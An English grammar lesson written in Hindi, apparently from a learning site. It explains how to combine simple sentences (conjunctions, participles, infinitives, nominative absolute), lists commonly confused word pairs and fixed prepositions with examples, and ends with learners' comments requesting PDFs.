Nominative Absolute वाक्य का वह स्वतन्त्र हिस्सा है जो वाक्य में न तो Subject है और न ही Object, लेकिन ये मुख्य कर्ता और क्रिया का वर्णन करता है।

Subject को participle की मदद से Nominative Absolute में बदल देते हैं।

कब जोड़ें – जब प्रत्येक वाक्य का subject अलग-अलग हो। जब वाक्यों में कारण और उनके परिणाम का सम्बन्ध हो।

कैसे जोड़ें – जो क्रिया पहले हो या फिर जो कारण बताये उसके subject को Nominative Absolute में बदल दें और दूसरा वाक्य ऐसे ही रहने दें।


Separate: He was absent. No business was transacted.

Combined: He being absent, no business was transacted.

-        Is, am, are, was, were (used as main verbs) – subject + being

Separate: The weather was stormy. The plane got late.

Combined: The weather being stormy, the plane got late.


Separate: The bed was wet. Rohan did not sit there.

Combined: ……………………………………….

Combined: The bed being wet, Rohan did not sit there.

-        Active voice – having + V3

Separate: The sun rose. The fog disappeared.

Combined: The sun having risen, the fog disappeared.

-        Passive voice – having been + V3

Separate: The captain was killed. The army fled.

Combined: The captain having been killed, the army fled.


…………………………………………..The End…………………………………………..




Pray (प्रार्थना करना) : We must pray to God.

    Prey (शिकार) : He fell a prey to cholera.



Stationary (स्थिर) : The sun is stationary.

    Stationery (लेखन सामग्री) : He deals in stationery.


Story (कहानी) : She told me a story.

    Storey (मंजिल) : His office is in the second storey.


Soar (उड़ना) : The bird is soaring high.

    Sour (खट्टा) : These grapes are sour.


Lose (खोना) : We should not lose this chance.

    Loose (ढीला) : In summer one should wear loose clothes.


Soul (आत्मा) : Soul is immortal.

    Sole (जूते का तला) : He got the sole of his shoe repaired.


Human (मानव) : We should be kind to all human beings.

    Humane (दयालु) : He is humane towards his servant.


Gate  (फाटक)  :  Open the gate before you enter.

         Gait  (चाल)     :   She was moving towards the stage with a fine gait.


Altar (वेदी) : Bhagat Singh sacrificed his life at the altar of motherland.

      Alter (बदलना) : You should alter your way of speaking.

Confidant (विश्वासपात्र) : Nehru was a confidant of Gandhiji.

    Confident (विश्वस्त) : He is confident of his success.


Carrier (माल ढोनेे वाला) : We use a carrier in our bicycles to carry our luggage.

    Career (जीवन) : We should study deeply for a good career.


Berth (रेलगाड़ी या जहाज में सोने का स्थान) : He reserved a first class berth in the Punjab Mail.

     Birth (जन्म) : What is your date of birth?

Affect  (प्रभाव डालना) : The heavy rains will affect the crops.

     Effect  (प्रभाव) : No advice produces any effect on him.

Access  (पहुंच)  :  Ravi has an access to the D. M.

     Excess  (अधिकता)  :  Excess of everything is bad.

Cite (उदाहरण देना) : Can you cite a few lines from Wordsworth.

    Site (स्थान) : This site is suitable for my new office.

Dual (दोहरा) : We should not adopt dual policy.

Duel (द्वंद्व युद्ध) : Sohrab was killed in a duel.



Fixed Prepositions

Look at (somebody or something) - देखना

Look at me.

Look at this.


Look after - ख्याल रखना

Can you look after my baby for two hours?


Look for - खोजना, ढूँढ़ना

What are you looking for?

I’m looking for my keys.


Look into – Investigate (जांच पड़ताल करना)

The police will look into the matter.


Admit to/into -

She was admitted to/into the school last year.


answer for somebody/something – to explain why somrthing happened

Their trainer must answer for the team’s poor performance.


Agree with someone (a person)-

I don’t agree with you.


Agree to something (view or opinion) –




Escape from – flee (बच कर भागना)

He escaped from prison.


Blind in/with (eye)- एक आँख से अंधे होने पर

Blind to (defects)-


Complain against someone

Complain of something


Consist of (Comprise)

Consist in (remain)


Cause for

Cause of something

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Synthesis (संश्लेषण)

= the process of combining separate parts

दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple, Compound या Complex Sentence बनाना ही Synthesis है। अर्थात जो नया रूप बनकर सामने आएगा वो simple Sentence हो सकता है, या compound Sentence हो सकता है या फिर complex Sentence हो सकता है।

प्रश्न कुछ इस तरह से आता है: Combine the following groups of Simple Sentences into one Simple Sentence (by using a Participle).


दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के तरीके:

किसी भी Simple Sentence में केवल एक Finite Verb होती है।

Finite Verb ऐसा Verb है जो कि वाक्य के subject व tense के बदलने पर बदल जाता है।

Note: पहले वाक्यों को हिंदी में अनुवाद कर लें, तब ज्यादा जल्दी कर पाएँगे।

कुल 8 तरीके हैं दो या दो से अधिक Simple Sentences को मिलाकर एक नया Simple Sentence बनाने के, जो इस प्रकार हैं –

1. Conjunction ‘And’ का प्रयोग करके

2. Adjective का प्रयोग करके

3. Adverb or Adverbial Phrase का प्रयोग करके

4. Infinitive का प्रयोग करके

5. Participle का प्रयोग करके

6. Noun or Gerund से पूर्व Preposition का प्रयोग करके

7. Noun or Phrase in apposition का प्रयोग करके

8. Nominative Absolute का प्रयोग करके


1. Conjunction ‘And’ का प्रयोग करके

कब जोड़ें - जब वाक्यों की क्रियाएँ एक ही हों।

कैसे जोड़ें – Subjects या Objects में जो अलग-अलग हों उन्हें “and” से जोड़ दें।


Separate: I need to buy a pen. I need to buy a box also.

Combined: I need to buy a pen and a box.

Separate: Rohan went to Delhi. Jojo was also with him.

Combined: Rohan and Jojo went to Delhi.

Separate: Meera saw the Taj. She saw the Red Fort also.

Combined: …………………………………………...

Combined: Meera saw the Taj and the Red Fort.


2. Adjective का प्रयोग करके

कब जोड़ें - जब एक sentence में ऐसा कोई adjective हो जो दूसरे sentence के noun की विशेषता बताये।

कैसे जोड़ें – उस adjective को उस noun के पास रख दें जिसकी वो विशेषता बता रहा है।


Separate: Rohan read a book. The book was old.

Combined: Rohan read an old book.

Separate: A man is going to the station. He is lame.

Combined: A lame man is going to the station.


Separate: A girl was weeping. She was hungry.

Combined: ……………………………………...

Combined: A hungry girl was weeping.


3. Adverb or Adverbial Phrase का प्रयोग करके

कब जोड़ें – जब एक वाक्य दूसरे वाक्य के क्रिया की विशेषता बताये।

कैसे जोड़ें – जो वाक्य विशेषता बताये, उसे adverb या adverbial phrase में बदल दें।


Separate: She went to school. She was punctual.

Combined: She went to school punctually.

Separate: They finished their work. It took them no time.

Combined: They finished their work in no time.

Separate: The river was flowing. Its flow was slow.

Combined: …………………………………

Combined: The river was flowing slowly.


4. Infinitive का प्रयोग करके

Infinitive = to + V1 (ना, नी, ने, के लिए)

कब जोड़ें – जब एक क्रिया दूसरे क्रिया का फल हो या फिर उद्देश्य हो।

कैसे जोड़ें – जो सामान्य क्रिया है उसे finite रहने दें, और जो फल या उद्देश्य बताये उसे बदल दें infinitive में।


Separate: Rohan went to Agra. He wanted to see the Taj.

Combined: Rohan went to Agra to see the Taj.

Separate: He has three sons. He has to educate them.

Combined: He has three sons to educate.

Separate: He is very fat. He cannot run fast.

Combined: He is too fat to run fast.

Separate: My uncle is quite weak. He cannot go for a morning walk.

Combined: ………………………………………………….

Combined: My uncle is too weak to go for a morning walk.


5. Noun or Gerund से पहले Preposition का प्रयोग करके

Gerund = V1 + ing (ना, नी, ने)


Separate: Meera bought a book. She gave 20 rupees for it.

Combined: Meera bought a book for 20 rupees.


Separate: The sun set. The journey was not ended.

Combined: The sun set before the end of the journey.


Combined: The journey was not ended before sunset.


Separate: She gave me advice. She also helped me.

Combined: Besides giving me advice, she helped me.


Separate: You helped her. She would have been drowned.

Combined: ……………………………………….

Combined: She would have been drowned without your help.


6. Participle का प्रयोग करके

Participle = ऐसा verb जो adjective का भी काम करे।

कब जोड़ें – जब अलग-अलग वाक्यों के Subjects एक ही हों। 

कैसे जोड़ें – जो कार्य पहले हुआ हो उसे participle में बदल दें और जो कार्य बाद में हुआ हो उसे finite ही रहने दें।

Participles तीन प्रकार के होते हैं:

(1) Present Participle = V1+ing (हुए, करके)

कब जोड़ें – जब अलग-अलग वाक्यों में कार्य लगभग साथ-साथ हो रहे हों या फिर दूसरा कार्य पहले कार्य का फल हो।

कैसे जोड़ें – जो कार्य पहले हुआ हो उसके verb को present participle में बदल दें।


Separate: He saw a lion. He ran away.

Combined: Seeing a lion, he ran away.


Separate: He saw a snake. He ran away.

Combined: Seeing a snake, he ran away.


Separate: He jumped up. He ran away.

Combined: Jumping up, he ran away.


Separate: I reached home.  I took off my clothes.

Combined: Reaching home, I took off my clothes.


Separate: She heard a noise. She turned back.

Combined: ……………………………….

Combined: Hearing a noise, she turned back.


-        Is, am, are, was, were (used as main verbs) – being

Separate: I was thirsty. I drank water.

Combined: Being thirsty, I drank water.


Separate: She was tired of playing. She sat down to take rest.

Combined: Being tired of playing, she sat down to take rest.


Combined: Tired of playing, she sat down to take rest.


कभी-कभी एक वाक्य का object दूसरे वाक्य का subject हो जाता है तथा उसके बारे में कुछ बातें कही गई होती हैं तो ऐसे में इसी कही गई बात को पहले वाक्य के object  के बाद लिख देते हैं।

Object + participle


Separate: I saw a man. He was carrying a lamp in his hand.

Combined: I saw a man carrying a lamp in his hand.


Separate: I saw Rohan. He was fighting with his brother.

Combined: I saw Rohan fighting with his brother.


Separate: We saw a bird. It was sitting on tree.

Combined: We saw a bird sitting on a tree.


(2) Past Participle = V3

कब जोड़ें – जब एक वाक्य का object दूसरे वाक्य में subject हो अक्सर दूसरा वाक्य Passive Voice में होता है।

कैसे जोड़ें – जो क्रिया पहले हुई हो उसे adjective की तरह noun से पहले प्रयोग करें।


Separate: I found my purse. It was lost.

Combined: I found my lost purse.


Separate: I saw a bear. It was wounded.

Combined: …………………………

Combined: I saw a wounded bear.


Separate: Rohan lost his book. He searched for it.

Combined: Rohan searched for his lost book.


(3) Perfect Participle = having + V3 (हुए, करके)

Having के साथ Verb का third form लगाने से perfect participle बनता है Active Voice में, तथा Having been के साथ Verb का third form लगाने से perfect participle बनता है Passive Voice में।

कब जोड़ें – जब एक कार्य complete होने पर दूसरा काम शुरू हो।

कैसे जोड़ें – जो कार्य complete हो गया हो उसे Participle में बदल दें।


Separate: The servant swept the room. He went away.

Combined: Having swept the room, the servant went away.


Separate: I completed the work.  I went to the market.

Combined: Having completed the work, I went to the market.


Separate: He had written a letter. He posted it.

Combined: ……………………………………

Combined: Having written a letter, he posted it.


अगर वाक्य passive में हो तो – having been + V3

Separate: Rohan was defeated by Ram. He was much disappointed.

Combined: Having been defeated by Ram, Rohan was much disappointed.


Separate: He was punished by the teacher. He felt sorry.

Combined: Having been punished by the teacher, he felt sorry.


7. Noun or Phrase in apposition का प्रयोग करके

Apposition = बगल-बगल

एक noun या phrase को उस noun या phrase के बगल में रखते हैं जिसकी वो व्याख्या कर रहा है और इसे दो commas के बीच में रखते हैं।

कब जोड़ें – जब अलग-अलग वाक्यों के nouns एक ही व्यक्ति या वस्तु का वर्णन करें।

कैसे जोड़ें – जिस noun के बारे में बताना है पहले वो लिखें, फिर व्याख्या करने वाले noun या phrase को दो commas के अंदर लिखें।


Separate: Rohan is a doctor. He is very smart.

Combined: Rohan, a doctor, is very smart.


Separate: Here is my sister-in-law. Her name is Meera.

Combined: Here is Meera, my sister-in-law.


Combined: Here is my sister-in-law, Meera.


Separate: Columbus was a famous sailor. He was an Italian. He discovered America.

Combined: Columbus, a famous Italian sailor, discovered America.


8. Nominative Absolute का प्रयोग करके

Nominative Absolute वाक्य का वह स्वतन्त्र हिस्सा है जो वाक्य में न तो Subject है और न ही Object, लेकिन ये मुख्य कर्ता और क्रिया का वर्णन करता है।

Subject को participle की मदद से Nominative Absolute में बदल देते हैं।

कब जोड़ें – जब प्रत्येक वाक्य का subject अलग-अलग हो। जब वाक्यों में कारण और उनके परिणाम का सम्बन्ध हो।

कैसे जोड़ें – जो क्रिया पहले हो या फिर जो कारण बताये उसके subject को Nominative Absolute में बदल दें और दूसरा वाक्य ऐसे ही रहने दें।


Separate: He was absent. No business was transacted.

Combined: He being absent, no business was transacted.

-        Is, am, are, was, were (used as main verbs) – subject + being

Separate: The weather was stormy. The plane got late.

Combined: The weather being stormy, the plane got late.


Separate: The bed was wet. Rohan did not sit there.

Combined: ……………………………………….

Combined: The bed being wet, Rohan did not sit there.

-        Active voice – having + V3

Separate: The sun rose. The fog disappeared.

Combined: The sun having risen, the fog disappeared.

-        Passive voice – having been + V3

Separate: The captain was killed. The army fled.

Combined: The captain having been killed, the army fled.


…………………………………………..The End…………………………………………..




Pray (प्रार्थना करना) : We must pray to God.

    Prey (शिकार) : He fell a prey to cholera.



Stationary (स्थिर) : The sun is stationary.

    Stationery (लेखन सामग्री) : He deals in stationery.


Story (कहानी) : She told me a story.

    Storey (मंजिल) : His office is in the second storey.


Soar (उड़ना) : The bird is soaring high.

    Sour (खट्टा) : These grapes are sour.


Lose (खोना) : We should not lose this chance.

    Loose (ढीला) : In summer one should wear loose clothes.


Soul (आत्मा) : Soul is immortal.

    Sole (जूते का तला) : He got the sole of his shoe repaired.


Human (मानव) : We should be kind to all human beings.

    Humane (दयालु) : He is humane towards his servant.


Gate  (फाटक)  :  Open the gate before you enter.

         Gait  (चाल)     :   She was moving towards the stage with a fine gait.


Altar (वेदी) : Bhagat Singh sacrificed his life at the altar of motherland.

      Alter (बदलना) : You should alter your way of speaking.

Confidant (विश्वासपात्र) : Nehru was a confidant of Gandhiji.

    Confident (विश्वस्त) : He is confident of his success.


Carrier (माल ढोनेे वाला) : We use a carrier in our bicycles to carry our luggage.

    Career (जीवन) : We should study deeply for a good career.


Berth (रेलगाड़ी या जहाज में सोने का स्थान) : He reserved a first class berth in the Punjab Mail.

     Birth (जन्म) : What is your date of birth?

Affect  (प्रभाव डालना) : The heavy rains will affect the crops.

     Effect  (प्रभाव) : No advice produces any effect on him.

Access  (पहुंच)  :  Ravi has an access to the D. M.

     Excess  (अधिकता)  :  Excess of everything is bad.

Cite (उदाहरण देना) : Can you cite a few lines from Wordsworth.

    Site (स्थान) : This site is suitable for my new office.

Dual (दोहरा) : We should not adopt dual policy.

Duel (द्वंद्व युद्ध) : Sohrab was killed in a duel.



Fixed Prepositions

Look at (somebody or something) - देखना

Look at me.

Look at this.


Look after - ख्याल रखना

Can you look after my baby for two hours?


Look for - खोजना, ढूँढ़ना

What are you looking for?

I’m looking for my keys.


Look into – Investigate (जांच पड़ताल करना)

The police will look into the matter.


Admit to/into -

She was admitted to/into the school last year.


answer for somebody/something – to explain why somrthing happened

Their trainer must answer for the team’s poor performance.


Agree with someone (a person)-

I don’t agree with you.


Agree to something (view or opinion) –




Escape from – flee (बच कर भागना)

He escaped from prison.


Blind in/with (eye)- एक आँख से अंधे होने पर

Blind to (defects)-


Complain against someone

Complain of something


Consist of (Comprise)

Consist in (remain)


Cause for

Cause of something

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Yogesh Kumar    29-07-2020 07:41:51 am

Very good mam

Tinu taral   29-07-2020 04:46:27 pm

Please give the pdf

Vijay kumar Jakhar   01-08-2020 08:51:35 pm

Please give me pdf

Satendra Kumar   02-08-2020 05:35:39 am


Anjali   02-08-2020 04:30:21 pm

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Gaurav kumar   03-08-2020 10:10:56 pm

Monir   04-08-2020 03:24:32 pm

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Gurpreet   06-08-2020 01:18:23 pm

I m very exited for learn English

Gagan   08-08-2020 01:29:06 pm

Rajesh sharma   11-08-2020 11:13:48 pm

thank you for learning

Deepa pandey   12-08-2020 07:15:16 pm


Mohd Zafar Ansari    14-08-2020 12:08:54 pm

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Harish singh   16-08-2020 04:35:00 am

I want pdf

Hemraj bairwa   20-08-2020 09:11:51 pm

Good mam kya bat hai good experince

Santosh parmar   28-08-2020 10:18:17 pm

Learn english

Kishore   13-09-2020 01:44:13 pm

I want join any course at learn spoken English

Anu Karsayal   17-09-2020 01:02:51 pm

Mam can u give notes

Anu Karsayal   17-09-2020 01:06:41 pm

Mam can u give notes

BHUT PARTH   22-09-2020 08:39:09 pm

Medam aap ALL TENSES ka PDF banayena plz

Pankaj gola   04-10-2020 04:26:24 am

I want notes

Pankaj gola   04-10-2020 04:27:12 am

I want notes

Shah sneha   06-10-2020 11:49:50 pm

Jeevan Kumar   10-10-2020 12:03:43 pm

   10-10-2020 03:24:26 pm

Thanks Mam

Sarvesh   10-10-2020 03:24:59 pm

   18-10-2020 12:44:51 pm

Vickylalsah   18-10-2020 09:24:24 pm

Thanks, you,mam

Vickylalsah   18-10-2020 09:34:17 pm


ABDULLAH MOHAMMAD   22-10-2020 11:42:36 pm

A million thanks to you

   31-10-2020 05:36:08 pm


Vivek Bhala   04-11-2020 06:16:17 am

   04-11-2020 11:07:36 pm

You are doing very useful videos .Thank you very much mam

   04-11-2020 11:07:38 pm

You are doing very useful videos .Thank you very much mam

Mamali Patra   08-11-2020 02:43:58 pm

Really this video is very use full for us.Thank you very much mam

Bhoomi   10-11-2020 09:21:54 pm

Mam ap English Sikh Aarti hai na to main aapse mujhe English sikhani hai main aap bol rahi hai nahin free mein tumhen mujhe English sikhani hai aapse please please aap mujhe English sikhao yojna

Bhoomi dixit   10-11-2020 09:22:54 pm

Main man 8:30 classroom shuru Karti hun fix time hai aapka

Ravindra Kumar   14-11-2020 08:49:35 pm

Nice video

Afshan    16-11-2020 08:26:39 am

Your video is very good I need the pdf file I learn English your video

Palak   22-11-2020 07:21:20 am

Very good

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